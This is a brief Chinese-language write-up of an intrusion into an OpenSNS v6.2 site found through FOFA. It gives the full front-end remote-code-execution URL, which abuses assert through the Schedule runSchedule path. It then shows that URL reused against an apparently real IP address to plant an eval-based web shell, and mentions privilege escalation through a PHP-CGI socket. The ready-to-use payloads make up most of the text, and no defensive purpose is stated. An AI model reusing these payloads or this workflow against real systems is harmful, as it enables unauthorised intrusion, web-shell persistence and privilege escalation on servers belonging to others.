fofa上直接找,找到某倒霉的站。 直接搜索OpenSNSv 6.2
首先开始试一试前台rce
index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id[0]=jiang
直接打通 看版本号5.4,一会提权要用 然后直接上马
http://106.54.23.125/index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=@eval($_POST[cmd])%26id[0]=jiang
找到这个目录/tmp/php-cgi-54.sock
进行提权  写入连接   成功提权。 参考
https://xz.aliyun.com/t/9936
|